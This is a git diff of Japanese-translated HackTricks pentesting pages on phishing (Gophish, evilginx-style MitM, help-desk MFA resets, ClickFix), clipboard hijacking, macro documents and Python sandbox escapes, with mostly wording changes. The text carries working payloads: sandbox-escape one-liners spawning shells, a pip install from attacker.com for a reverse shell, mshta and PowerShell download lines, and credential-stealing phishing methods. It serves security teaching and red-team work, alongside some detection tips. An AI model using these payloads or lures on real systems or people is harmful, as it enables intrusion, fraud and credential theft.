(10) (15) (2).png>) +![](<../../images/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (15) (2).png>) > [!TIP] -> "**テストメールを送信**"機能を使用して、すべてが正常に動作していることをテストすることをお勧めします。\ -> テストを行う際にブラックリストに載らないように、**テストメールを10分メールアドレスに送信する**ことをお勧めします。 +> "**テストメールを送信**"機能を使用して、すべてが正常に動作しているかをテストすることをお勧めします。\ +> テストを行う際にブラックリストに載らないように、**テストメールを10分メールアドレスに送信することをお勧めします**。 ### メールテンプレート @@ -339,22 +339,22 @@ WRITE HERE SOME SIGNATURE OF SOMEONE FROM THE COMPANY ``` -**メールの信頼性を高めるために**、クライアントからのメールの署名を使用することをお勧めします。提案: +注意してほしいのは、**メールの信頼性を高めるために**、クライアントからのメールの署名を使用することが推奨されるということです。提案: - **存在しないアドレス**にメールを送信し、返信に署名が含まれているか確認します。 -- info@ex.comやpress@ex.com、public@ex.comのような**公開メール**を検索し、メールを送信して返信を待ちます。 -- **発見された有効な**メールに連絡を試み、返信を待ちます。 +- **public emails**(例:info@ex.com、press@ex.com、public@ex.com)を探し、メールを送信して返信を待ちます。 +- **いくつかの有効な発見された**メールに連絡を試み、返信を待ちます。 ![](<../../images/image (80).png>) > [!TIP] -> メールテンプレートでは、**送信するファイルを添付**することもできます。NTLMチャレンジを特別に作成したファイル/ドキュメントを使用して盗むことに興味がある場合は、[このページを読んでください](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md)。 +> Email Templateでは、**送信するファイルを添付することもできます**。NTLMチャレンジを特別に作成したファイル/ドキュメントを使用して盗むことに興味がある場合は、[このページを読む](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md)。 ### ランディングページ - **名前**を記入 - **ウェブページのHTMLコード**を記入します。ウェブページを**インポート**することもできます。 -- **送信されたデータをキャプチャ**と**パスワードをキャプチャ**にチェックを入れます。 +- **提出されたデータをキャプチャ**と**パスワードをキャプチャ**にチェックを入れます。 - **リダイレクト**を設定します。 ![](<../../images/image (826).png>) @@ -364,7 +364,7 @@ WRITE HERE SOME SIGNATURE OF SOMEONE FROM THE COMPANY > HTML用に**静的リソース**(おそらくCSSやJSページ)を使用する必要がある場合は、_**/opt/gophish/static/endpoint**_に保存し、_**/static/\**_からアクセスできます。 > [!TIP] -> リダイレクトでは、**被害者の正当なメインウェブページにユーザーをリダイレクト**するか、例えば_/static/migration.html_にリダイレクトし、5秒間**スピニングホイール**(**[https://loading.io/](https://loading.io)**)を表示し、その後プロセスが成功したことを示すことができます。 +> リダイレクトでは、**被害者の正当なメインウェブページにユーザーをリダイレクトする**か、例えば_/static/migration.html_にリダイレクトし、5秒間**スピニングホイール**(**[https://loading.io/](https://loading.io)**)を表示し、その後プロセスが成功したことを示すことができます。 ### ユーザーとグループ @@ -396,7 +396,7 @@ clone-a-website.md ## バックドア付きドキュメントとファイル -いくつかのフィッシング評価(主にレッドチーム向け)では、**バックドアを含むファイルを送信**したい場合があります(C2かもしれませんし、認証をトリガーする何かかもしれません)。\ +いくつかのフィッシング評価(主にレッドチーム向け)では、**バックドアを含むファイルを送信する**ことも望ましいです(おそらくC2、または認証をトリガーする何か)。\ いくつかの例については、次のページを確認してください: {{#ref}} @@ -407,32 +407,32 @@ phishing-documents.md ### プロキシMitM経由 -前述の攻撃は非常に巧妙で、実際のウェブサイトを偽装し、ユーザーによって設定された情報を収集します。残念ながら、ユーザーが正しいパスワードを入力しなかった場合や、偽装したアプリケーションが2FAで構成されている場合、**この情報では騙されたユーザーを偽装することはできません**。 +前述の攻撃は非常に巧妙で、実際のウェブサイトを偽装し、ユーザーが設定した情報を収集します。残念ながら、ユーザーが正しいパスワードを入力しなかった場合や、偽装したアプリケーションが2FAで設定されている場合、**この情報では騙されたユーザーを偽装することはできません**。 -ここで、[**evilginx2**](https://github.com/kgretzky/evilginx2)**、**[**CredSniper**](https://github.com/ustayready/CredSniper)および[**muraena**](https://github.com/muraenateam/muraena)のようなツールが役立ちます。このツールは、MitMのような攻撃を生成することができます。基本的に、攻撃は次のように機能します: +ここで、[**evilginx2**](https://github.com/kgretzky/evilginx2)**、**[**CredSniper**](https://github.com/ustayready/CredSniper)および[**muraena**](https://github.com/muraenateam/muraena)のようなツールが役立ちます。このツールは、MitMのような攻撃を生成することを可能にします。基本的に、攻撃は次のように機能します: 1. 実際のウェブページのログインフォームを**偽装**します。 2. ユーザーは**資格情報**を偽のページに送信し、ツールはそれを実際のウェブページに送信し、**資格情報が機能するか確認します**。 -3. アカウントが**2FA**で構成されている場合、MitMページはそれを要求し、**ユーザーが入力**すると、ツールはそれを実際のウェブページに送信します。 -4. ユーザーが認証されると、(攻撃者として)**資格情報、2FA、クッキー、およびツールがMitMを実行している間のすべてのインタラクションの情報をキャプチャ**します。 +3. アカウントが**2FA**で設定されている場合、MitMページはそれを要求し、**ユーザーが入力**すると、ツールはそれを実際のウェブページに送信します。 +4. ユーザーが認証されると、あなた(攻撃者)は**資格情報、2FA、クッキー、ツールがMitMを実行している間のすべてのインタラクションの情報をキャプチャ**します。 ### VNC経由 -**被害者を元のページと同じ外観の悪意のあるページに送信する代わりに、**実際のウェブページに接続されたブラウザの**VNCセッション**に送信したらどうなりますか?彼が何をしているかを見ることができ、パスワード、使用されているMFA、クッキーを盗むことができます。\ +もし、**被害者を元のページと同じ外観の悪意のあるページに送る代わりに、実際のウェブページに接続されたブラウザの**VNCセッションに送ることができればどうでしょうか?彼が何をしているかを見ることができ、パスワード、使用されるMFA、クッキーを盗むことができます...\ これを[**EvilnVNC**](https://github.com/JoelGMSec/EvilnoVNC)で行うことができます。 ## 検出の検出 -当然のことながら、バストされたかどうかを知る最良の方法の1つは、**ブラックリスト内で自分のドメインを検索すること**です。リストに表示されている場合、何らかの形であなたのドメインが疑わしいと検出されました。\ +明らかに、バストされたかどうかを知る最良の方法の1つは、**ブラックリスト内で自分のドメインを検索すること**です。リストに表示されている場合、何らかの形であなたのドメインが疑わしいと検出されました。\ ドメインがブラックリストに表示されているかどうかを確認する簡単な方法は、[https://malwareworld.com/](https://malwareworld.com)を使用することです。 -ただし、被害者が**野生の疑わしいフィッシング活動を積極的に探しているかどうかを知る他の方法もあります**。詳細は以下に説明します: +ただし、被害者が**野生で疑わしいフィッシング活動を積極的に探しているかどうかを知る他の方法もあります**。これは次のように説明されています: {{#ref}} detecting-phising.md {{#endref}} -被害者のドメインに非常に似た名前のドメインを**購入する**ことができます。または、あなたが制御するドメインの**サブドメイン**のために**証明書を生成する**ことができます。被害者のドメインの**キーワード**を含むものです。**被害者**がそれらと何らかの**DNSまたはHTTPインタラクション**を行うと、**彼が積極的に探している**ことがわかり、非常にステルスである必要があります。 +非常に似た名前のドメインを**購入する**ことができます。被害者のドメインの**キーワード**を含む**サブドメイン**のために証明書を**生成する**こともできます。もし**被害者**がそれらと何らかの**DNSまたはHTTPインタラクション**を行うと、**彼が積極的に探している**ことがわかり、非常にステルスである必要があります。 ### フィッシングの評価 @@ -440,7 +440,7 @@ detecting-phising.md ## 高接触型アイデンティティ侵害(ヘルプデスクMFAリセット) -現代の侵入セットは、メールの誘惑を完全にスキップし、**サービスデスク/アイデンティティ回復ワークフローを直接ターゲット**にしてMFAを打破します。この攻撃は完全に「土地を生き抜く」ものであり、オペレーターが有効な資格情報を持っていると、組み込みの管理ツールを使用してピボットします - マルウェアは必要ありません。 +現代の侵入セットは、メールの誘惑を完全にスキップし、**サービスデスク/アイデンティティ回復ワークフローを直接ターゲットにしてMFAを打破します**。攻撃は完全に「土地を生きる」ものであり、オペレーターが有効な資格情報を持つと、組み込みの管理ツールを使用してピボットします - マルウェアは必要ありません。 ### 攻撃フロー 1. 被害者の偵察 @@ -449,8 +449,8 @@ detecting-phising.md 2. リアルタイムのソーシャルエンジニアリング * ターゲットを偽装してヘルプデスクに電話、Teams、またはチャットします(しばしば**偽の発信者ID**または**クローン音声**を使用)。 * 以前に収集したPIIを提供して、知識ベースの検証を通過します。 -* エージェントを**MFAシークレットのリセット**または登録された携帯番号の**SIMスワップ**を行うように説得します。 -3. アクセス後の即時アクション(実際のケースで≤60分) +* エージェントに**MFAシークレットをリセット**させるか、登録された携帯番号で**SIMスワップ**を実行させます。 +3. アクセス後の即時アクション(実際のケースでは≤60分) * 任意のウェブSSOポータルを通じて足場を確立します。 * 組み込みを使用してAD/AzureADを列挙します(バイナリはドロップされません): ```powershell @@ -476,17 +476,17 @@ Get-MgUserRegisteredDevice -UserId --- ## 大規模な欺瞞 - SEOポイズニングと「ClickFix」キャンペーン -コモディティクルーは、高接触オペレーションのコストをオフセットするために、**検索エンジンと広告ネットワークを配信チャネルに変える**大規模な攻撃を行います。 +コモディティクルーは、高接触オペレーションのコストをオフセットするために、**検索エンジンと広告ネットワークを配信チャネルに変えた大量攻撃**を行います。 -1. **SEOポイズニング/マルバタイジング**は、`chromium-update[.]site`のような偽の結果をトップ検索広告に押し上げます。 -2. 被害者は小さな**第一段階のローダー**(しばしばJS/HTA/ISO)をダウンロードします。Unit 42によって確認された例: +1. **SEOポイズニング/マルバタイジング**は、`chromium-update[.]site`のような偽の結果を検索広告のトップに押し上げます。 +2. 被害者は小さな**第一段階のローダー**(しばしばJS/HTA/ISO)をダウンロードします。Unit 42によって見られた例: * `RedLine stealer` * `Lumma stealer` * `Lampion Trojan` 3. ローダーはブラウザのクッキーと資格情報DBを外部に送信し、その後**サイレントローダー**を引き出し、*リアルタイム*でデプロイするかどうかを決定します: * RAT(例:AsyncRAT、RustDesk) * ランサムウェア/ワイパー -* 永続コンポーネント(レジストリの実行キー + スケジュールされたタスク) +* 永続コンポーネント(レジストリのRunキー + スケジュールされたタスク) ### ハードニングのヒント * 新しく登録されたドメインをブロックし、**高度なDNS/URLフィルタリング**を*検索広告*およびメールに強制します。 @@ -507,27 +507,27 @@ and child_image: *\\*.exe |-------|-----------------------------| |自動化|ランダム化された文言とトラッキングリンクを使用して、>100kのメール/SMSを生成して送信。| |生成AI|公開M&A、ソーシャルメディアの内部ジョークを参照する*一回限り*のメールを生成;コールバック詐欺でのディープフェイクCEO音声。| -|エージェンティックAI|自律的にドメインを登録し、オープンソースのインテリジェンスをスクレイピングし、被害者がクリックするが資格情報を送信しない場合に次の段階のメールを作成。| +|エージェンティックAI|自律的にドメインを登録し、オープンソースのインテリジェンスをスクレイピングし、被害者がクリックするが資格情報を提出しない場合に次の段階のメールを作成。| **防御:** -• 信頼できない自動化から送信されたメッセージを強調する**動的バナー**を追加します(ARC/DKIMの異常を介して)。 +• **動的バナー**を追加し、信頼できない自動化から送信されたメッセージを強調表示します(ARC/DKIMの異常を介して)。 • 高リスクの電話リクエストに対して**音声生体認証チャレンジフレーズ**を展開します。 • 意識プログラムでAI生成の誘惑を継続的にシミュレートします - 静的テンプレートは時代遅れです。 --- ## MFA疲労/プッシュボンビングバリアント - 強制リセット -クラシックなプッシュボンビングに加えて、オペレーターは単に**ヘルプデスクの呼び出し中に新しいMFA登録を強制**し、ユーザーの既存のトークンを無効にします。以降のログインプロンプトは被害者にとって正当なものに見えます。 +クラシックなプッシュボンビングに加えて、オペレーターは単に**ヘルプデスクの呼び出し中に新しいMFA登録を強制し、ユーザーの既存のトークンを無効にします**。その後のログインプロンプトは被害者にとって正当なものに見えます。 ```text [Attacker] → Help-Desk: “I lost my phone while travelling, can you unenrol it so I can add a new authenticator?” [Help-Desk] → AzureAD: ‘Delete existing methods’ → sends registration e-mail [Attacker] → Completes new TOTP enrolment on their own device ``` -AzureAD/AWS/Oktaのイベントを監視し、**`deleteMFA` + `addMFA`**が**同じIPから数分以内に発生する**場合を確認します。 +AzureAD/AWS/Oktaのイベントを監視し、**`deleteMFA` + `addMFA`** が**同じIPから数分以内に**発生する場合を確認します。 ## クリップボードハイジャック / ペーストジャッキング -攻撃者は、侵害されたまたはタイポスクワッティングされたウェブページから被害者のクリップボードに悪意のあるコマンドを静かにコピーし、その後ユーザーを騙して**Win + R**、**Win + X**、またはターミナルウィンドウ内にペーストさせ、ダウンロードや添付なしで任意のコードを実行させることができます。 +攻撃者は、侵害されたまたはタイポスクワットされたウェブページから被害者のクリップボードに悪意のあるコマンドを静かにコピーし、その後ユーザーを騙して**Win + R**、**Win + X**、またはターミナルウィンドウ内にペーストさせ、ダウンロードや添付なしで任意のコードを実行させることができます。 {{#ref}} clipboard-hijacking.md diff --git a/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md b/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md index 049b309c2..ffe6b9262 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md @@ -4,11 +4,11 @@ > "自分でコピーしていないものは絶対に貼り付けないこと。" – 古いが今でも有効なアドバイス -## 概要 +## Overview -Clipboard hijacking – 別名 *pastejacking* – は、ユーザーがコマンドを検査せずに日常的にコピー&ペーストする事実を悪用します。悪意のあるウェブページ(またはElectronやデスクトップアプリケーションなどのJavaScript対応コンテキスト)は、攻撃者が制御するテキストをプログラム的にシステムクリップボードに配置します。被害者は、通常は巧妙に作成されたソーシャルエンジニアリングの指示によって、**Win + R**(実行ダイアログ)、**Win + X**(クイックアクセス / PowerShell)を押すか、ターミナルを開いてクリップボードの内容を*貼り付け*し、任意のコマンドを即座に実行するように促されます。 +Clipboard hijacking – 別名 *pastejacking* – は、ユーザーがコマンドを検査せずに日常的にコピー&ペーストする事実を悪用します。悪意のあるウェブページ(またはElectronやデスクトップアプリケーションなどのJavaScript対応コンテキスト)は、攻撃者が制御するテキストをプログラム的にシステムクリップボードに配置します。被害者は、通常は巧妙に作成されたソーシャルエンジニアリングの指示によって、**Win + R**(実行ダイアログ)、**Win + X**(クイックアクセス / PowerShell)を押すか、ターミナルを開いてクリップボードの内容を*貼り付け*、任意のコマンドを即座に実行するように促されます。 -**ファイルはダウンロードされず、添付ファイルも開かれないため**、この手法は添付ファイル、マクロ、または直接コマンド実行を監視するほとんどのメールおよびウェブコンテンツのセキュリティ制御を回避します。したがって、この攻撃はNetSupport RAT、Latrodectusローダー、またはLumma Stealerなどのコモディティマルウェアファミリーを配信するフィッシングキャンペーンで人気があります。 +**ファイルはダウンロードされず、添付ファイルは開かれないため**、この手法は添付ファイル、マクロ、または直接コマンド実行を監視するほとんどのメールおよびウェブコンテンツのセキュリティ制御を回避します。したがって、この攻撃はNetSupport RAT、Latrodectusローダー、またはLumma Stealerなどのコモディティマルウェアファミリーを配信するフィッシングキャンペーンで人気があります。 ## JavaScript Proof-of-Concept ```html @@ -26,7 +26,7 @@ navigator.clipboard.writeText(payload) ## ClickFix / ClearFake フロー -1. ユーザーがタイポスクワッティングされたか、侵害されたサイト(例: `docusign.sa[.]com`)を訪れます。 +1. ユーザーがタイポスクワッティングされたまたは侵害されたサイト(例: `docusign.sa[.]com`)を訪れます。 2. 注入された **ClearFake** JavaScript が `unsecuredCopyToClipboard()` ヘルパーを呼び出し、静かにBase64エンコードされたPowerShellワンライナーをクリップボードに保存します。 3. HTMLの指示が被害者に次のように伝えます: *“**Win + R** を押し、コマンドを貼り付けてEnterを押して問題を解決してください。”* 4. `powershell.exe` が実行され、正当な実行可能ファイルと悪意のあるDLLを含むアーカイブをダウンロードします(クラシックDLLサイドローディング)。 @@ -55,7 +55,7 @@ powershell -nop -enc # Cloud Identificator: 2031 ``` mshta https://iplogger.co/xxxx =+\\xxx ``` -**mshta** コールは、`PartyContinued.exe` を取得し、`Boat.pst` (CAB) を抽出し、`extrac32` とファイル連結を通じて `AutoIt3.exe` を再構築し、最終的にブラウザの資格情報を `sumeriavgv.digital` に流出させる `.a3x` スクリプトを実行する隠れた PowerShell スクリプトを起動します。 +**mshta** コールは、`PartyContinued.exe` を取得し、`Boat.pst` (CAB) を抽出し、`extrac32` とファイルの連結を通じて `AutoIt3.exe` を再構築し、最終的にブラウザの資格情報を `sumeriavgv.digital` に外部送信する `.a3x` スクリプトを実行する隠れた PowerShell スクリプトを起動します。 ## 検出とハンティング @@ -76,6 +76,7 @@ mshta https://iplogger.co/xxxx =+\\xxx ## 関連トリック * **Discord 招待ハイジャック** は、ユーザーを悪意のあるサーバーに誘導した後、同じ ClickFix アプローチを悪用することがよくあります: + {{#ref}} discord-invite-hijacking.md {{#endref}} diff --git a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md index 7201d9128..71c352941 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md @@ -4,17 +4,17 @@ ## Officeドキュメント -Microsoft Wordはファイルを開く前にファイルデータの検証を行います。データ検証は、OfficeOpenXML標準に対してデータ構造の識別という形で行われます。データ構造の識別中にエラーが発生した場合、分析中のファイルは開かれません。 +Microsoft Wordは、ファイルを開く前にファイルデータの検証を行います。データ検証は、OfficeOpenXML標準に対してデータ構造の識別の形で行われます。データ構造の識別中にエラーが発生した場合、分析中のファイルは開かれません。 -通常、マクロを含むWordファイルは`.docm`拡張子を使用します。しかし、ファイル拡張子を変更することでファイル名を変更し、マクロの実行機能を保持することが可能です。\ -例えば、RTFファイルは設計上マクロをサポートしていませんが、DOCMファイルをRTFに名前を変更すると、Microsoft Wordによって処理され、マクロの実行が可能になります。\ +通常、マクロを含むWordファイルは`.docm`拡張子を使用します。しかし、ファイル拡張子を変更することでファイルの名前を変更し、マクロ実行機能を保持することが可能です。\ +例えば、RTFファイルは設計上マクロをサポートしていませんが、RTFに名前を変更したDOCMファイルはMicrosoft Wordによって処理され、マクロの実行が可能になります。\ 同じ内部構造とメカニズムは、Microsoft Office Suiteのすべてのソフトウェア(Excel、PowerPointなど)に適用されます。 次のコマンドを使用して、いくつかのOfficeプログラムによって実行される拡張子を確認できます: ```bash assoc | findstr /i "word excel powerp" ``` -DOCXファイルは、マクロを含むリモートテンプレートを参照することができ(ファイル – オプション – アドイン – 管理: テンプレート – 移動)、マクロを「実行」することができます。 +DOCXファイルは、マクロを含むリモートテンプレートを参照することができ(ファイル – オプション – アドイン – 管理: テンプレート – 移動)、マクロを「実行」することもできます。 ### 外部画像の読み込み @@ -29,7 +29,7 @@ _**カテゴリ**: リンクと参照, **フィールド名**: includePicture, * #### 自動ロード関数 -一般的であればあるほど、AVがそれらを検出する可能性が高くなります。 +一般的であればあるほど、AVがそれを検出する可能性が高くなります。 - AutoOpen() - Document_Open() @@ -71,7 +71,7 @@ proc.Create "powershell #### ドキュメント拡張子 完了したら、**ファイルの種類**のドロップダウンを選択し、形式を**`.docx`**から**Word 97-2003 `.doc`**に変更します。\ -これは、**`.docx`**内にマクロを保存できず、マクロ対応の**`.docm`**拡張子には**スティグマ**があるためです(例:サムネイルアイコンに大きな`!`があり、一部のウェブ/メールゲートウェイはそれらを完全にブロックします)。したがって、この**レガシー`.doc`拡張子が最良の妥協案です**。 +これは、**`.docx`**内にマクロを保存できず、マクロ対応の**`.docm`**拡張子には**スティグマ**があるためです(例:サムネイルアイコンには大きな`!`があり、一部のウェブ/メールゲートウェイはそれらを完全にブロックします)。したがって、この**レガシー`.doc`拡張子が最良の妥協案です**。 #### 悪意のあるマクロ生成ツール @@ -144,10 +144,12 @@ self.close **以下のページでこれらのアイデアやその他を確認してください:** + {{#ref}} ../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md {{#endref}} + {{#ref}} ../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md {{#endref}} @@ -157,6 +159,6 @@ self.close ハッシュや認証を盗むだけでなく、**NTLMリレー攻撃を実行する**こともできることを忘れないでください: - [**NTLMリレー攻撃**](../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#ntml-relay-attack) -- [**AD CS ESC8 (証明書へのNTLMリレー)**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8) +- [**AD CS ESC8 (NTLMリレーから証明書へ)**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md b/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md index 48491f63d..7872c6a10 100644 --- a/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md +++ b/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md @@ -6,7 +6,7 @@ ## コマンド実行ライブラリ -最初に知っておくべきことは、すでにインポートされているライブラリを使用して直接コードを実行できるか、またはこれらのライブラリのいずれかをインポートできるかどうかです。 +最初に知っておくべきことは、すでにインポートされているライブラリを使って直接コードを実行できるか、またはこれらのライブラリのいずれかをインポートできるかどうかです。 ```python os.system("ls") os.popen("ls").read() @@ -39,7 +39,7 @@ open('/var/www/html/input', 'w').write('123') execfile('/usr/lib/python2.7/os.py') system('ls') ``` -_**open**_ および _**read**_ 関数は、python サンドボックス内の **ファイルを読み取る** ためや、**バイパス**するために **実行** できる **コードを書く** ために便利です。 +_**open**_ および _**read**_ 関数は、python サンドボックス内の **ファイルを読み取る** ためや、**バイパス**するために **実行できるコードを書く** ために便利です。 > [!CAUTION] > **Python2 input()** 関数は、プログラムがクラッシュする前に python コードを実行することを許可します。 @@ -77,14 +77,14 @@ print(base64.b64encode(pickle.dumps(P(), protocol=0))) pip install http://attacker.com/Rerverse.tar.gz pip.main(["install", "http://attacker.com/Rerverse.tar.gz"]) ``` -パッケージをダウンロードしてリバースシェルを作成するには、こちらをクリックしてください。使用する前に、**解凍し、`setup.py`を変更し、リバースシェル用のIPを設定する必要があります**: +ここからリバースシェルを作成するためのパッケージをダウンロードできます。使用する前に、**解凍し、`setup.py`を変更し、リバースシェル用のIPを設定する必要があります**: {{#file}} Reverse.tar (1).gz {{#endfile}} -> [!NOTE] -> このパッケージは`Reverse`と呼ばれています。しかし、リバースシェルを終了すると、残りのインストールが失敗するように特別に作成されているため、**サーバーに余分なPythonパッケージがインストールされることはありません**。 +> [!TIP] +> このパッケージは`Reverse`と呼ばれています。しかし、リバースシェルを終了すると、残りのインストールが失敗するように特別に作成されているため、**サーバーに余分なPythonパッケージがインストールされたままにならない**ようになっています。 ## Pythonコードの評価 @@ -112,7 +112,7 @@ exec("\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73\x exec('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='.decode("base64")) #Only python2 exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk=')) ``` -### Pythonコードを評価するための他のライブラリ +### Pythonコードを評価することを許可する他のライブラリ ```python #Pandas import pandas as pd @@ -126,7 +126,7 @@ df.query("@pd.read_pickle('http://0.0.0.0:6334/output.exploit')") # Like: df.query("@pd.annotations.__class__.__init__.__globals__['__builtins__']['eval']('print(1)')") ``` -## オペレーターとショートトリック +## 演算子と短いトリック ```python # walrus operator allows generating variable inside a list ## everything will be executed in order @@ -135,9 +135,9 @@ df.query("@pd.annotations.__class__.__init__.__globals__['__builtins__']['eval'] [y:=().__class__.__base__.__subclasses__()[84]().load_module('builtins'),y.__import__('signal').alarm(0), y.exec("import\x20os,sys\nclass\x20X:\n\tdef\x20__del__(self):os.system('/bin/sh')\n\nsys.modules['pwnd']=X()\nsys.exit()", {"__builtins__":y.__dict__})] ## This is very useful for code injected inside "eval" as it doesn't support multiple lines or ";" ``` -## エンコーディングを通じた保護の回避 (UTF-7) +## Bypassing protections through encodings (UTF-7) -In [**this writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#misc-latexipy) UFT-7は、見かけ上のサンドボックス内で任意のPythonコードをロードして実行するために使用されます: +In [**this writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#misc-latexipy) UFT-7は、見かけ上のサンドボックス内で任意のPythonコードをロードして実行するために使用されます: ```python assert b"+AAo-".decode("utf_7") == "\n" @@ -178,11 +178,11 @@ class _:pass ``` ### RCE オブジェクトの作成とオーバーロード -クラスを**宣言**し、そのクラスの**オブジェクト**を**作成**できる場合、**異なるメソッド**を**書き換え/上書き**して、**直接呼び出すことなく**それらを**トリガー**することができます。 +クラスを**宣言**し、そのクラスの**オブジェクトを作成**できる場合、**異なるメソッドを記述/上書き**して、それらを**直接呼び出すことなく****トリガー**することができます。 #### カスタムクラスによるRCE -いくつかの**クラスメソッド**(_既存のクラスメソッドを上書きするか、新しいクラスを作成することによって_)を修正して、**直接呼び出すことなく**トリガーされたときに**任意のコード**を**実行**させることができます。 +既存のクラスメソッドを上書きするか、新しいクラスを作成することで、一部の**クラスメソッド**を修正し、**直接呼び出すことなく**トリガーされたときに**任意のコードを実行**させることができます。 ```python # This class has 3 different ways to trigger RCE without directly calling any function class RCE: @@ -251,7 +251,7 @@ Sub['import os; os.system("sh")'] ``` #### 例外を伴うオブジェクトの作成 -**例外がトリガーされる**と、**Exception**のオブジェクトが**作成され**、あなたがコンストラクタを直接呼び出す必要はありません([**@\_nag0mez**](https://mobile.twitter.com/_nag0mez)からのトリック): +**例外がトリガーされる**と、**Exception**のオブジェクトが**直接コンストラクタを呼び出すことなく作成されます**([**@\_nag0mez**](https://mobile.twitter.com/_nag0mez)からのトリック): ```python class RCE(Exception): def __init__(self): @@ -314,7 +314,7 @@ __builtins__.__dict__['__import__']("os").system("ls") ``` ### No Builtins -`__builtins__`がない場合、何もインポートできず、ファイルを読み書きすることもできません。**すべてのグローバル関数**(`open`、`import`、`print`など)が**ロードされていないため**です。\ +`__builtins__`がない場合、何もインポートできず、ファイルを読み書きすることもできません。**すべてのグローバル関数**(`open`、`import`、`print`など)は**ロードされていない**ためです。\ しかし、**デフォルトではPythonは多くのモジュールをメモリにインポートします**。これらのモジュールは無害に見えるかもしれませんが、その中には**危険な**機能を**インポートしている**ものもあり、それにアクセスすることで**任意のコード実行**を得ることができます。 以下の例では、**無害な**モジュールのいくつかを**悪用**して、内部の**危険な****機能**に**アクセス**する方法を観察できます。 @@ -375,7 +375,7 @@ __builtins__["__import__"]("os").system("ls") # There are lots of other payloads that can be abused to execute commands # See them below ``` -## グローバルとローカル +## グローバル変数とローカル変数 **`globals`** と **`locals`** を確認することは、アクセスできるものを知る良い方法です。 ```python @@ -401,15 +401,15 @@ class_obj.__init__.__globals__ [ x for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__)] [, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ] ``` -[**以下により大きな関数があります**](#recursive-search-of-builtins-globals) で、**グローバル**を見つけることができる**場所**を数十/**数百**見つけることができます。 +[**以下により大きな関数があります**](#recursive-search-of-builtins-globals) で、数十/**数百**の**場所**を見つけることができます**globals**。 ## 任意の実行を発見する -ここでは、**より危険な機能**を簡単に発見し、より信頼性の高いエクスプロイトを提案する方法を説明したいと思います。 +ここでは、**より危険な機能を簡単に発見する**方法を説明し、より信頼性の高いエクスプロイトを提案したいと思います。 #### バイパスを使用したサブクラスへのアクセス -この技術の最も敏感な部分の一つは、**ベースサブクラス**にアクセスできることです。前の例では `''.__class__.__base__.__subclasses__()` を使用してこれを行いましたが、**他の可能な方法**もあります: +この技術の最も敏感な部分の一つは、**ベースサブクラスにアクセスする**ことができることです。前の例では `''.__class__.__base__.__subclasses__()` を使用してこれを行いましたが、**他にも可能な方法**があります: ```python #You can access the base from mostly anywhere (in regular conditions) "".__class__.__base__.__subclasses__() @@ -444,11 +444,11 @@ defined_func.__class__.__base__.__subclasses__() [ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ] ['_ModuleLock', '_DummyModuleLock', '_ModuleLockManager', 'ModuleSpec', 'FileLoader', '_NamespacePath', '_NamespaceLoader', 'FileFinder', 'zipimporter', '_ZipImportResourceReader', 'IncrementalEncoder', 'IncrementalDecoder', 'StreamReaderWriter', 'StreamRecoder', '_wrap_close', 'Quitter', '_Printer', 'WarningMessage', 'catch_warnings', '_GeneratorContextManagerBase', '_BaseExitStack', 'Untokenizer', 'FrameSummary', 'TracebackException', 'CompletedProcess', 'Popen', 'finalize', 'NullImporter', '_HackedGetData', '_localized_month', '_localized_day', 'Calendar', 'different_locale', 'SSLObject', 'Request', 'OpenerDirector', 'HTTPPasswordMgr', 'AbstractBasicAuthHandler', 'AbstractDigestAuthHandler', 'URLopener', '_PaddedFile', 'CompressedValue', 'LogRecord', 'PercentStyle', 'Formatter', 'BufferingFormatter', 'Filter', 'Filterer', 'PlaceHolder', 'Manager', 'LoggerAdapter', '_LazyDescr', '_SixMetaPathImporter', 'MimeTypes', 'ConnectionPool', '_LazyDescr', '_SixMetaPathImporter', 'Bytecode', 'BlockFinder', 'Parameter', 'BoundArguments', 'Signature', '_DeprecatedValue', '_ModuleWithDeprecations', 'Scrypt', 'WrappedSocket', 'PyOpenSSLContext', 'ZipInfo', 'LZMACompressor', 'LZMADecompressor', '_SharedFile', '_Tellable', 'ZipFile', 'Path', '_Flavour', '_Selector', 'JSONDecoder', 'Response', 'monkeypatch', 'InstallProgress', 'TextProgress', 'BaseDependency', 'Origin', 'Version', 'Package', '_Framer', '_Unframer', '_Pickler', '_Unpickler', 'NullTranslations'] ``` -たくさんありますが、**私たちはコマンドを実行するために一つだけ必要です**: 